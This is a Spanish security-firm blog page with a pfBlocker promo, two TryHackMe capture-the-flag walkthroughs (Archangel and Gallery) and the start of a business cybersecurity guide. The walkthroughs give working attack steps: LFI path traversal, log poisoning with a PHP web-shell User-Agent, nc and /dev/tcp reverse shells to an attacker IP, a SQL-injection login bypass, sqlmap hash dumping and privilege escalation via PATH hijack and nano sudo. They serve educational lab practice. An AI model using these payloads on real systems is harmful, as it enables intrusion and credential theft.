910 053 662 [email protected]
pfBlocker en pfSense: El Mejor Escudo en la Navegación Web

pfBlocker en pfSense: El Mejor Escudo en la Navegación Web

¡Bienvenidos a DCSeguridad, tu aliado en el mundo de la ciberseguridad para pymes! Si estás aquí, es probable que te preguntes qué beneficios conlleva el uso de pfBlocker en pfSense para la red de tu empresa. En este artículo, despejaremos todas tus dudas y te mostraremos cómo esta poderosa herramienta puede convertirse en tu mejor defensa en la navegación web. Así que, sin más preámbulos, ¡empecemos!

Pfblocker En Pfsense

La Importancia de la Seguridad en la Navegación Web

En el vertiginoso mundo digital de hoy, donde la tecnología y la conectividad son pilares fundamentales para las pymes, la seguridad en la navegación web se ha convertido en una preocupación apremiante. No importa el tamaño de tu empresa; las amenazas en línea son una realidad que afecta a todos por igual. Desde los emprendedores más pequeños hasta las medianas empresas, todos comparten un interés común: mantener sus sistemas y datos protegidos.

Vivimos en una era en la que la información fluye constantemente a través de la web. Desde comunicaciones empresariales hasta transacciones financieras y almacenamiento de datos en la nube, prácticamente todas las actividades comerciales dependen de la red. Sin embargo, esta interconexión constante también abre la puerta a una serie de amenazas que pueden poner en riesgo la integridad de tu empresa.

Los ciberdelincuentes están en constante búsqueda de vulnerabilidades que puedan explotar para acceder a sistemas y datos confidenciales. Los ataques cibernéticos pueden variar:

  • Desde simples intentos de phishing
  • Hasta ataques más sofisticados que pueden causar estragos en tu red y operaciones comerciales

Las consecuencias de un ciberataque pueden ser devastadoras:

  • Desde la pérdida de datos críticos
  • Hasta daños en la reputación de tu empresa y costos financieros significativos

Por lo tanto, la seguridad en la navegación web se ha convertido en una prioridad ineludible. Es esencial contar con herramientas y estrategias efectivas que protejan tu red empresarial contra las amenazas en línea. La inversión en ciberseguridad no solo es una medida proactiva para proteger tu empresa, sino que también es una muestra de compromiso con la confianza de tus clientes y socios comerciales.

En este contexto, pfBlocker en pfSense se destaca como una herramienta esencial para fortalecer la seguridad en la navegación web. ¿Quieres saber cómo esta solución puede convertirse en tu mejor aliado en la lucha contra las amenazas cibernéticas? Sigue leyendo para descubrirlo.

¿Qué es pfBlocker en pfSense?

Para entender los beneficios de pfBlocker en pfSense, primero debemos comprender qué es. En pocas palabras, pfBlocker es una aplicación que se integra con pfSense, un sistema operativo de firewall de código abierto. Su función principal es bloquear el tráfico no deseado o malicioso en la red, actuando como un escudo protector.

Beneficios de pfBlocker en pfSense

1. Navegación Web Segura

Una de las principales ventajas de pfBlocker es la creación de una capa adicional de seguridad en la navegación web. Bloquea automáticamente sitios web maliciosos conocidos, reduciendo significativamente el riesgo de infección por malware.

2. Inspección de Contenido

pfBlocker no solo se limita a bloquear sitios web, sino que también ofrece inspección de contenido. Esto significa que puedes establecer políticas para bloquear ciertos tipos de contenido, como contenido para adultos o sitios de redes sociales, lo que aumenta la productividad en el lugar de trabajo.

3. Listas Negras y Listas Blancas de pfBlocker en pfSense

Con la capacidad de administrar listas negras y listas blancas, tienes un control total sobre los sitios web permitidos y bloqueados. Personaliza las reglas según las necesidades de tu empresa.

4. DNSBL (Listas de Bloqueo de DNS)

pfBlocker utiliza listas de bloqueo de DNS para prevenir el acceso a dominios maliciosos. Esto asegura una protección más robusta y evita que el malware se comunique con servidores de comando y control.

5. Inspección de DNS

pfBlocker inspecciona el tráfico DNS, detectando y bloqueando las solicitudes a servidores DNS no autorizados. Esto fortalece la seguridad y evita que los atacantes eludan el firewall.

6. Resolución Segura de DNS

Con pfBlocker, puedes utilizar servidores DNS seguros como OpenDNS o Quad9, que ofrecen protección adicional contra sitios web maliciosos y phishing.

Cómo pfBlocker en pfSense Protege tu Pyme

Imagina pfBlocker como un guardián vigilante que protege las puertas de tu red. Cada vez que un usuario o dispositivo intenta acceder a un sitio web, pfBlocker verifica si está en una lista negra o si cumple con tus políticas de contenido. Si no pasa la prueba, se bloquea el acceso.

Maximiza la Retención: ¡Descubre más Beneficios!

Hasta ahora, hemos explorado los beneficios clave de pfBlocker en pfSense, pero hay mucho más por descubrir. ¿Quieres aprender cómo implementar pfBlocker en tu empresa? ¿Deseas conocer las mejores prácticas para mantener tu red segura? Sigue leyendo y desbloquea todo el potencial de esta herramienta.

Conclusion: Tu Escudo en la Web

En resumen, pfBlocker en pfSense es una pieza esencial en la estrategia de ciberseguridad de tu pyme. Protege tu negocio contra amenazas en línea, garantiza una navegación web segura y te brinda el control sobre el acceso a sitios web y contenido. No escatimes en seguridad, ¡y pfBlocker será tu mejor aliado!

Únete a DC Seguridad

En DCSeguridad, estamos comprometidos en ayudar a las pymes a fortalecer su seguridad en línea. Si deseas implementar pfBlocker en pfSense o necesitas asesoramiento personalizado en ciberseguridad, ¡contáctanos hoy mismo! Únete a nuestro canal de Telegram para estar al tanto de las últimas noticias y consejos de seguridad.

No comprometas la seguridad de tu empresa. ¡Confía en DC Seguridad y protege tu negocio en línea como nunca antes!

Manual paso a paso Archangel TryHackMe de Hacking Ético

Manual paso a paso Archangel TryHackMe de Hacking Ético

A continuación se presenta un manual paso a paso para realizar la máquina Archangel TryHackMe (https://tryhackme.com/room/archangel) el Hacking Ético en el desafío CTF. El manual incluye explicaciones sobre los comandos utilizados y sus respectivas banderas.

Nota: Este manual tiene fines educativos y solo debe ser utilizado en entornos controlados y con autorización.

Antes de empezar, recomendamos realizar los siguientes pasos preparativos:

  1. Añade la IP de la máquina al archivo host
  2. Crea un directorio con el nombre de la máquina para tener organizados los archivos
  3. Crea un archivo para ir anotando todos los indicios que vayamos encontrando
Archangel Tryhackme Portada

Paso 1: Verificar la disponibilidad de la máquina

ping -c 1 <ip_máquina>

Este comando se utiliza para verificar la disponibilidad de la máquina objetivo mediante un ping.

Archangel Tryhackme Ping

Paso 2: Escanear puertos

nmap -A -sCVS --min-rate 5000 -v -n -Pn <ip_máquina> -oN archangel_nmap

El comando nmap se utiliza para realizar un escaneo de puertos en la máquina objetivo. Los flags utilizados tienen los siguientes significados:

  • -A: Realiza un escaneo completo, que incluye detección de servicios y sistemas operativos.
  • -sCVS: Realiza un escaneo de versiones y scripts.
  • --min-rate 5000: Establece la tasa mínima de paquetes enviados por segundo a 5000.
  • -v: Muestra una salida detallada.
  • -n: No realiza resolución DNS.
  • -Pn: Ignora el descubrimiento de hosts y trata todas las direcciones IP como accesibles.
  • -oN archangel_nmap: Guarda la salida en el archivo "archangel_nmap".

Este escaneo revelará los puertos abiertos en la máquina, en este caso, los puertos 80 y 22.

Archangel Tryhackme Nmap

Paso 3: Explorar directorios con wfuzz

wfuzz -c --hc=404 -w /ruta_diccionario -u http://ip/FUZZ

El comando wfuzz se utiliza para buscar directorios y archivos ocultos en un servidor web. Los flags utilizados son:

  • -c: Ignora las respuestas con código de estado 404 (no encontrado).
  • --hc=404: Configura el código de estado que se debe ignorar.
  • -w /ruta_diccionario: Especifica la ruta del diccionario a utilizar.
  • -u http://ip/FUZZ: Establece la URL objetivo, donde "FUZZ" se reemplazará por las palabras del diccionario.

Este comando buscará directorios ocultos en el servidor web utilizando un diccionario de palabras.

Archangel Tryhackme Wfuzz1

Paso 4: Investigar directorio "flag" y redirecciones

burpsuite

Aquí no encontramos ninguna redirección rara, por lo que seguimos al siguiente paso, entrar en la web y encontrar el otro hostname que nos comentan. Cambia el archivo host para añadir el nuevo hostname encontrado.

Archangel Tryhackme Hostname
Archangel Tryhackme Hostname1

Paso 5: Realizar escaneo de directorios con gobuster en Archangel TryHackMe

gobuster dir -w /diccionario -x php,html,txt -t 100 -q -u <ip_máquina>

El comando gobuster se utiliza para realizar un escaneo de directorios y archivos en un servidor web. Los flags utilizados son:

  • dir: Realiza un escaneo de directorios.
  • -w /diccionario: Especifica la ruta del diccionario a utilizar.
  • -x php,html,txt: Establece las extensiones de archivo a buscar.
  • -t 100: Establece el número de hilos simultáneos.
  • -q: Muestra solo los resultados encontrados.
  • -u <ip_máquina>: Establece la URL objetivo.

Este escaneo revelará posibles directorios y archivos en la máquina objetivo, en esta ocasión vemos el archivo robots.txt, procedemos a acceder a él y vemos una página accesible, que vamos a ir a ella.

Archangel Tryhckme Gobuster

Paso 6: Investigar contenido de la nueva página

Explora el contenido del nuevo host encontrado en los pasos anteriores y busca pistas adicionales o banderas. También accede al archivo robots.txt y a la web encontrada en este archivo.

Archangel Tryhackme Flag1

Paso 7: Local File Inclusion (LFI) Archangel TryHackMe

Accede al archivo /test.php para explorar una posible vulnerabilidad de Local File Inclusion (LFI). Esto podría proporcionar una vía de intrusión al sistema.

Vamos a probar a ver a que tenemos acceso en este servidor, para ello vamos a poner después de la carpeta de development /.././.././.././../etc/passwd para ver si tenemos acceso, el poner /.././ es para engañar al servidor y que no separa que estamos realizando un LFI, en otros casos, con /../../ y así sucesivamente podemos tener acceso a los archivos.

Archangel Tryhackme Lfi1

Tras esto vemos que tenemos acceso a ese archivo, y vemos los usuarios que pueden logarse en el servidor, como primera opción, y por probar, vamos a realizar un ataque con hydra: hydra -l archangel -P /dirección/diccionario <ip_máquina> ssh con esto no conseguimos nada, por lo que vamos a ver a que archivos tenemos acceso.

Archangel Tryhackme Hydra

Vamos a ver los logs del apache, y ver si podemos hacer un ataque log poisoning para ello siguiendo la técnica anterior en vez de /etc/passwd accedemos a: /var/log/apache2/access.log, al tener acceso, vamos a proceder a realizar un ataque de log poisoning, si quieres aprender mas sobre esto, te dejo este enlace: https://ironhackers.es/tutoriales/lfi-to-rce-envenenando-ssh-y-apache-logs/

Archangel Tryhackme Logpoisoning1

Paso 9: Log Poisoning Archangel TryHackMe

Para realizar el ataque abre burpsuite y captura el tráfico una vez capturado, mándalo directamente al repeater y realiza modificaciones en el campo "User-Agent" del encabezado de la petición. Cambia la parte entre paréntesis (X11; Linux...) por el siguiente código: <?php system($_GET['cmd']); ?>. Además, agrega &cmd=id después de .log en la URL. Luego, envía la petición y verifica sí recibes una respuesta con el ID del usuario "www-data".

Archangel Tryhackme Burpsuite1
Archangel Tryhackme Burpsuite 2

Paso 10: Acceso remoto a la máquina objetivo

Reemplaza el &cmd=id del paso anterior por un reverse shell generado en https://www.revshells.com/. Utiliza el siguiente comando:

&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip_maquina_atacante> puerto >/tmp/f

Ahora selecciona desde el = hasta la f y debes de codificar la URL, para ello dale botón derecho Convert Selection -> URL -> encode-all-characters.

Archangel Tryhackme Burpsuite 3

Ponte en escucha en tu máquina atacante el puerto especificado para obtener acceso remoto a la máquina objetivo utilizando Netcat (nc -nvlp puerto).

Dale a send y espera a tener el control de la máquina víctima.

Archangel Tryhackme Nc1

Paso 11: Búsqueda de banderas y escalada de privilegios en Archangel TryHackMe

Una vez dentro de la máquina, busca las banderas y explora las opciones disponibles para la escalada de privilegios. Considera los binarios, capacidades, permisos de sudo y crontab para encontrar posibles vulnerabilidades y obtener privilegios adicionales.

Identifica un cron que se ejecuta cada minuto con el usuario "archangel".

Archangel Tryhackme Cron1

Intenta realizar una escalada de privilegios aprovechando este cron. Edita el archivo utilizando el editor de texto Nano y reemplaza la línea "hello world" por el siguiente comando:

sh -i >& /dev/tcp/10.9.81.252/1234 0>&1
Archangel Tryhackme Cron2

Abre otro terminal y ejecuta nc -nvlp 1234. Espera hasta que obtengas acceso a la máquina como el usuario "archangel". A partir de aquí, explora las opciones disponibles para la escalada de privilegios con este usuario.

Archangel Tryhackme Nc2

Paso 12: Acceso a la carpeta "secret" y ejecución de comandos

Accede a la carpeta "secret" y examina los archivos presentes en ella. Si encuentras un archivo comprimido, investiga su contenido utilizando el comando string. Observa que se ejecuta comandos y busca la presencia del comando "cp".

Archangel Tryhackme Strings
Archangel Tryhackme Cp

Paso 13: Escalada de privilegios y obtención de acceso root en Archangel TryHackMe

Crea un archivo llamado "cp" y establece los siguientes permisos en él: chmod u+s /bin/bash. Luego, otorga permisos de lectura, escritura y ejecución a todos los usuarios utilizando el comando chmod 777 cp.

Archangel Tryhackme Cp1

A continuación, agrega el comando "cp" al PATH mediante el comando export PATH=.:$PATH. Después, ejecuta el archivo de backup utilizando ./backup y, finalmente, ejecuta el comando bash -p para obtener acceso como usuario root.

¡La máquina ha sido completamente comprometida! Ahora, busca la última bandera para completar el desafío.

Recuerda que este manual está diseñado para un desafío CTF y solo debe ser utilizado con fines educativos en entornos controlados y con autorización.

Resumen Archangel TryHackMe

La máquina Archangel TryHackMe presenta los siguientes aspectos clave:

  • Escaneo de puertos: Se utiliza la herramienta Nmap para identificar los puertos abiertos en la máquina. Se descubren los puertos 80 y 22 abiertos, lo que indica la presencia de servicios web y SSH.
  • Búsqueda de directorios ocultos: Se emplea la herramienta wfuzz para encontrar directorios y archivos ocultos en el sitio web. Mediante el análisis de las respuestas obtenidas, se descubre un directorio llamado "flag".
  • Análisis de redirecciones: A través de Burp Suite, se analiza la redirección encontrada en el directorio "flag". Sin embargo, la redirección lleva a un video de YouTube y no proporciona información adicional relevante.
  • Exploración de directorios con gobuster: Se utiliza la herramienta gobuster para buscar directorios ocultos en el dominio encontrado en el host. Se espera a que gobuster finalice su exploración mientras se busca la primera bandera en la nueva página.
  • Explotación de una vulnerabilidad LFI: Se descubre un archivo accesible llamado "test.php", el cual resulta ser una vulnerabilidad de inclusión de archivos locales (LFI). Se aprovecha esta vulnerabilidad para realizar un ataque de log poisoning y obtener información privilegiada, como el ID del usuario "www-data".
  • Reverse Shell: Mediante la técnica de log poisoning, se logra establecer un reverse shell en la máquina objetivo. Esto proporciona acceso remoto a la máquina a través de una conexión inversa desde la máquina del atacante.
  • Escalada de privilegios: Se exploran diferentes opciones para la escalada de privilegios. Se encuentra un cron ejecutándose con el usuario "archangel" y se realiza una segunda escalada de privilegios modificando el archivo correspondiente. Esto permite obtener acceso al usuario "archangel" y se buscan otras opciones de escalada de privilegios.
  • Búsqueda de banderas: Durante el proceso de hacking, se busca y recopila información sobre las banderas ocultas en la máquina. Se debe encontrar la última bandera después de comprometer la máquina y obtener privilegios de root.

Estas son las principales técnicas y pasos utilizados durante el CTF para lograr comprometer la máquina objetivo y obtener acceso a la información privilegiada.

Confía en DCSeguridad:

Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.

Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!

Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!

Galley TryHackMe manual resolución paso a paso. Pentesting

Galley TryHackMe manual resolución paso a paso. Pentesting

Descubre cómo realizar pentesting en la máquina Galley TryHackMe (https://tryhackme.com/room/gallery666) con nuestro completo manual. Aprende los pasos de preparación, técnicas de hackeo y escalada de privilegios. Obtén un enfoque práctico para proteger y fortalecer tus habilidades en seguridad informática. ¡Sigue nuestra guía paso a paso y conviértete en un experto en ciberseguridad!

Galley TryHackMe

Paso 1: Preparación del entorno para resolver Galley TryHackMe

Antes de comenzar con el pentesting, es importante realizar los siguientes pasos de preparación:

  1. Actualización del sistema operativo: Asegúrate de tener la versión más reciente del sistema operativo que utilizarás durante el proceso de pentesting. Esto te garantizará tener las últimas actualizaciones de seguridad y correcciones de errores.
  2. Organización de archivos: Crea una carpeta dedicada para la máquina que estás analizando. Esto te permitirá mantener tus archivos y resultados organizados de manera efectiva a lo largo del proceso.
  3. Configuración del archivo de hosts: Agrega la dirección IP de la máquina que estás analizando al archivo de hosts de tu sistema. Esto facilitará el acceso a la máquina durante el proceso de pentesting.
  4. Registro de indicios: Crea un archivo o registro donde puedas documentar todos los posibles indicios y hallazgos que descubras durante el análisis. Esto te ayudará a llevar un seguimiento ordenado y completo de tu progreso y resultados.

Realizar estos pasos de preparación garantizará que tengas un entorno adecuado y organizado para llevar a cabo el pentesting de manera eficiente.

Paso 2: Comienza el Hackeo en Galley TryHackMe

Una vez que hayas preparado el entorno, procede con los siguientes pasos para iniciar el hackeo:

Comprobación de disponibilidad: Para verificar si la máquina objetivo está en línea, utiliza el comando ping -c 1 [ip_maquina]. Esto enviará un solo paquete de ping a la dirección IP de la máquina y te indicará si está accesible.

Gallery Tryhackme Ping

Enumeración de puertos abiertos: Utiliza el siguiente comando para identificar los puertos abiertos en la máquina objetivo y responder la primera pregunta planteada:

   nmap -A -sCVS --min-rate 5000 -n -v -Pn [ip_maquina] -oN gallery_nmap

Este comando utiliza Nmap para realizar un escaneo exhaustivo de la máquina y muestra información detallada sobre los servicios y versiones en los puertos abiertos. El resultado revelará que los puertos 80 y 8080 están abiertos.

Gallery Tryhackme Nmap

Escaneo web con WhatWeb: A continuación, utiliza el comando whatweb [ip_maquina]:80 y whatweb [ip_maquina]:8080 para realizar un escaneo web en los puertos abiertos. Esto proporcionará información sobre las tecnologías y aplicaciones utilizadas en los servicios web.

Exploración de la aplicación con Dirb: Para buscar posibles directorios y archivos ocultos en la aplicación web que se encuentra en el puerto 8080, ejecuta el siguiente comando:

   dirb http://gallery.thm:8080

Dirb realizará un análisis exhaustivo de la aplicación en busca de rutas y archivos que puedan ser relevantes para el hackeo.

Paso 3: Búsqueda de Exploits

Después de realizar los pasos anteriores sin encontrar resultados, es hora de buscar posibles exploits que puedan ser aprovechados en la versión de "Simple Image Gallery". Sigue los siguientes pasos:

Utiliza la herramienta searchsploit para buscar exploits relacionados con la versión de "Simple Image Gallery":

   searchsploit simple image gallery
Gallery Tryhackme Searchexploit

Este comando buscará en la base de datos de exploits de la herramienta "searchsploit" y mostrará posibles exploits disponibles para la versión específica de "Simple Image Gallery".

Encuentra y selecciona dos posibles exploits que parezcan relevantes para tu objetivo.

Prueba el primer exploit seleccionado que permita una inyección SQL en el campo de inicio de sesión. Por ejemplo, si el exploit muestra una inyección SQL exitosa utilizando el usuario "admin" con la siguiente cadena: admin' or '1'='1'#, realiza la inyección en el campo de inicio de sesión para loguearte como administrador:

   username: admin' or '1'='1'#
   password: [deja en blanco]
Gallery Tryhackme Exploit1

Si la inyección SQL tiene éxito, obtendrás acceso al sitio como administrador.

Una vez dentro del sitio, explora las funcionalidades y opciones disponibles. Observa la sección de álbumes y verifica que existe la posibilidad de subir una "shell reversa".

Configura un listener en tu máquina atacante utilizando netcat para escuchar conexiones entrantes en un puerto específico:

   nc -nlvp [puerto]
Gallery Tryhackme Nc 1

Haz clic en la opción de subir archivo para subir una "shell reversa" en el sitio web. Esto iniciará una conexión a tu máquina atacante y proporcionará acceso al servidor objetivo.

Gallery Tryhackme 2

Paso 4: Segundo Exploit y Obtención del Hash de Contraseña

Salimos del Shell reverso y vamos a explorar otras opciones, con el otro exploit, para volver al shell reverso tenemos tiempo, y además aprenderemos nuevas formas de ataques y obtención de objetivos.

Abre Burp Suite y captura una solicitud HTTP cuando cargas una imagen en la aplicación. Guarda la solicitud capturada en un archivo llamado "test.req".

Utiliza la herramienta sqlmap para analizar la solicitud capturada y obtener información sobre las bases de datos presentes en la aplicación:

   sqlmap -r test.req --dbs
Gallery Tryhackme Sqlmap

Este comando enviará la solicitud capturada a la herramienta sqlmap, que analizará la estructura de la base de datos en busca de posibles vulnerabilidades.

Una vez obtenidos los nombres de las bases de datos, como "gallery_db" e "information_schema", ejecuta el siguiente comando para enumerar las tablas en la base de datos seleccionada:

   sqlmap -r test.req -D database_name --tables
Gallery Tryhackme Sqlmap 2

Reemplaza "database_name" por el nombre de la base de datos que deseas explorar.

Ahora, para obtener información sobre los usuarios y sus hashes de contraseña, ejecuta el siguiente comando:

   sqlmap -r test.req -D database_name -T table_name --dump
Gallery Tryhackme Sqlmap 4

Reemplaza "database_name" por el nombre de la base de datos y "table_name" por el nombre de la tabla que contiene los datos de los usuarios. Este comando extraerá la información de los usuarios, incluyendo los hashes de contraseña, si están disponibles.

Paso 5: Volver a la Shell Reversa en Galley TryHackMe

En este paso, retomaremos el uso de la shell reversa para obtener acceso al servidor objetivo. Sigue los siguientes pasos:

Configura una shell reversa en la máquina atacante para establecer la conexión con el servidor. Para mejorar la shell reversa, utiliza el siguiente comando:

   script /dev/null -c bash

Esta línea de comando mejorará la interactividad y estabilidad de la shell reversa.

Exporta la variable de entorno "TERM" a "xterm" para asegurar una correcta visualización del terminal:

   export TERM=xterm

Monta un servidor HTTP en tu máquina atacante utilizando Python para transferir el archivo "linpeas.sh" al servidor objetivo. Ejecuta el siguiente comando:

   python3 -m http.server
Gallery Tryhackme Httpserver

Esto iniciará un servidor HTTP en tu máquina atacante.

En la máquina víctima, accede a un directorio en el que tengas los permisos necesarios y descarga el archivo "linpeas.sh" desde tu servidor atacante. Por ejemplo, si has elegido el directorio "/tmp", utiliza el siguiente comando:

   wget [tu_ip]:8000/linpeas.sh -O /tmp/linpeas.sh

Asegúrate de reemplazar "[tu_ip]" con la dirección IP de tu máquina atacante.

Otorga permisos de ejecución al archivo "linpeas.sh":

   chmod +x /tmp/linpeas.sh

Ejecuta el script "linpeas.sh" para buscar vulnerabilidades en el sistema:

   bash /tmp/linpeas.sh
Gallery Tryhackme Linpeas

Espera a que el script finalice su ejecución y analiza los resultados en busca de posibles vulnerabilidades.

Durante el análisis, es posible que descubras una contraseña de usuario. Prueba esta contraseña con el usuario "mike" utilizando el siguiente comando:

Gallery Tryhackme Password
   su mike

Si la contraseña es correcta, ahora tendrás acceso como el usuario "mike".

Verifica los permisos disponibles para tu usuario utilizando el comando:

   sudo -l

Observa si tienes permisos para ejecutar archivos con la ruta "/bin/bash" utilizando el comando "sudo".

Gallery Tryhackme Sudo L

Paso 6: Escalada de Privilegios Final para Galley TryHackMe

En este paso, realizaremos la escalada final de privilegios utilizando una vulnerabilidad específica en el comando nano. Sigue los siguientes pasos:

Al hacer cat en el archivo en cuestión, descubrimos que podemos escalar privilegios utilizando nano con la opción read. Para obtener más información sobre cómo aprovechar esta vulnerabilidad, sigue las instrucciones detalladas en el siguiente enlace: https://gtfobins.github.io/gtfobins/nano/#sudo

Gallery Tryhackme Nano

Vamos a obtener una shell mejorada utilizando los siguientes pasos:

  • Escribe script /dev/null -c bash en la línea de comandos y presiona Ctrl+Z para suspender el proceso.
  • Una vez en tu terminal, escribe - stty raw -echo ; fg y presiona Enter. Esto reanudará la ejecución del proceso suspendido.
  • Ahora estarás de vuelta en la shell. Escribe reset y presiona Enter.
Gallery Tryhackme Mejora Terminal

Ejecuta el comando sudo -l para verificar los privilegios disponibles. Observa la opción encontrada para ejecutar sudo /bin/bash /opt/rootkit.sh. Sin embargo, es posible que recibas un error de terminal.

Para solucionar el error de terminal, escribe export TERM=xterm y presiona Enter.

Gallery Tryhackme Terminal

Ahora, ejecuta nuevamente el comando sudo /bin/bash /opt/rootkit.sh y en las opciones de nano, elige read.

Gallery Tryhackme Privilegios

Ahora, realiza los siguientes pasos en nano:

   ^R^X (Ctrl+R, Ctrl+X)

Esto te proporcionará una línea de comandos en la parte inferior de nano. Escribe:

   reset; sh 1>&0 2>&0
Gallery Tryhackme Root1

Esto establecerá una nueva sesión de shell.

¡Ahora serás el usuario root! Puedes obtener la última bandera y realizar cualquier acción como root.

Gallery Tryhackme Root

Siguiendo estos pasos, lograrás la escalada final de privilegios y obtendrás acceso como usuario root. Asegúrate de seguir las mejores prácticas de seguridad y actuar de manera ética en todo momento.

Resumen del proceso y tipo de máquina trabajada:

En este manual, se ha seguido un proceso paso a paso para realizar el pentesting de la máquina Gallery en Try Hack Me. Se han cubierto los siguientes aspectos clave:

  1. Preparación del entorno: Actualización del sistema operativo, organización de archivos, configuración del archivo de hosts y registro de indicios.
  2. Comienzo del hackeo: Comprobación de disponibilidad, enumeración de puertos abiertos, escaneo web con WhatWeb y exploración de la aplicación con Dirb.
  3. Búsqueda de exploits: Utilización de la herramienta "searchsploit" para buscar exploits relacionados con la versión de "Simple Image Gallery" y prueba de exploits seleccionados.
  4. Obtención del hash de contraseña: Captura de una solicitud HTTP con Burp Suite, análisis de la solicitud con "sqlmap" para obtener información sobre las bases de datos, tablas y usuarios, y extracción de los hashes de contraseña.
  5. Volver a la shell reversa: Configuración de la shell reversa, transferencia de archivos y búsqueda de vulnerabilidades en el sistema.
  6. Escalada de privilegios final: Utilización de una vulnerabilidad en el comando "nano" para realizar la escalada de privilegios hasta el usuario "root".

Según la experiencia proporcionada, la máquina Gallery de Try Hack Me es una máquina de nivel intermedio, aunque en la plataforma es fácil. Proporciona la oportunidad de practicar varias técnicas de pentesting, incluyendo enumeración de puertos, análisis de aplicaciones web, búsqueda de exploits, obtención de información de bases de datos y escalada de privilegios. Este tipo de máquinas son ideales para aquellos que desean mejorar sus habilidades en seguridad informática y familiarizarse con los procesos y herramientas utilizados en el pentesting.

Confía en DCSeguridad:

Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.

Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!

Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!

Fortaleciendo la Ciberseguridad Empresarial: La Guía Esencial

Fortaleciendo la Ciberseguridad Empresarial: La Guía Esencial

La ciberseguridad empresarial es un factor crucial para el éxito de cualquier iniciativa de transformación digital en el entorno empresarial. Sin embargo, muchas organizaciones comprometen diariamente su seguridad en línea, no solo debido a la falta de recursos técnicos, sino también por las actividades cotidianas realizadas por sus empleados. La falta de conocimiento y formación interna en ciberseguridad para empresas puede convertirse en una debilidad e incluso representar una amenaza, dejando a la organización vulnerable a posibles ciberataques.

La transformación digital de las pymes y grandes empresas es uno de los principales ejes del Plan de Recuperación implementado por el Gobierno de España, con el respaldo de la UE y los fondos Next Generation. Este enfoque se complementa con otras acciones, como la digitalización de las administraciones públicas, el desarrollo de habilidades digitales en la población, una mayor conectividad, la implementación del 5G y la integración de la inteligencia artificial en el contexto económico actual.

A continuación, presentamos unos consejos sencillos que le ayudarán a fortalecer la ciberseguridad de su empresa y protegerla de posibles ciberataques en línea.

Ciberseguridad Empresarial

Guía de Ciberseguridad Empresarial: Consejos para Proteger su Negocio

Según el Informe Global de Ciberseguridad 2022, elaborado por la Unión Internacional de Telecomunicaciones (ITU), España se sitúa en el cuarto puesto a nivel mundial en términos de compromiso con la ciberseguridad.

Este informe evalúa 25 indicadores y 5 bloques temáticos, basándose en encuestas realizadas a expertos en ciberseguridad, instituciones, colaboradores y diversos actores involucrados de cada país participante. En cuanto a los cinco bloques temáticos del informe, España obtuvo la mejor puntuación solo en dos áreas, "legal" y "organizacional", mientras que las demás áreas, que incluyen "cooperación", "construcción de capacidad" y "técnica", mostraron un rendimiento inferior.

Tomando en cuenta estos datos, hemos creado esta breve Guía de Ciberseguridad Empresarial que recopila consejos indispensables para evitar ciberataques y proteger la seguridad en línea de su negocio.

Mantener el software actualizado

Es fundamental mantener actualizados el sistema operativo (SO), el antivirus y cualquier otro programa instalado en todos los dispositivos utilizados para las actividades profesionales diarias, como ordenadores de escritorio, portátiles, tablets o smartphones.

Los hackers siempre buscan vulnerabilidades en los sistemas para llevar a cabo ataques cibernéticos. Por esta razón, las empresas deben concienciar a sus empleados sobre la importancia de mantener actualizado el software de los equipos que utilizan durante su jornada laboral. De esta manera, se previenen posibles vulnerabilidades que podrían comprometer información sensible de la compañía, como datos de clientes o información financiera.

Precaución con el correo electrónico

El correo electrónico es una de las principales vías de entrada para los ciberataques. En la actualidad, la mayoría de las empresas utilizan clientes de correo electrónico como Microsoft Outlook o Mozilla Thunderbird, en lugar de servicios de webmail como Gmail, que están destinados a un uso más personal.

Sin importar la herramienta de comunicación corporativa que se utilice, es vital concienciar a los empleados sobre los peligros del mal uso del correo electrónico. En este sentido, se recomienda que la empresa establezca una política clara para el uso seguro y adecuado del correo electrónico, que garantice su protección y prevenga el spam y el phishing.

Tanto el spam (correo no deseado) como las estafas de phishing son mecanismos utilizados por los ciberdelincuentes para obtener datos sensibles como contraseñas y datos bancarios. Para protegerse, se recomienda:

  • No abrir correos electrónicos de remitentes desconocidos.
  • Agregar el correo no deseado a la lista de spam y eliminarlo.
  • Prestar atención a cualquier elemento sospechoso en el contenido del correo electrónico.
  • Inspeccionar los enlaces antes de hacer clic en ellos.
  • Activar filtros antispam.
  • Utilizar contraseñas seguras para acceder al correo electrónico.
  • Utilizar la función de copia oculta (CCO) al enviar el mismo correo a múltiples destinatarios.

Estas precauciones ayudarán a reducir los riesgos asociados con el correo electrónico y protegerán a la empresa de posibles amenazas cibernéticas.

Realizar copias de seguridad siguiendo la regla del 3-2-1

Es fundamental seguir la regla del 3-2-1 en cuanto a las copias de seguridad para proteger la información valiosa de su negocio. Si no ha oído hablar de esta regla antes, le recomendamos prestar especial atención a este consejo de la Guía de Ciberseguridad para Empresas, ya que puede ayudar a evitar la pérdida total de datos en caso de un posible ciberataque.

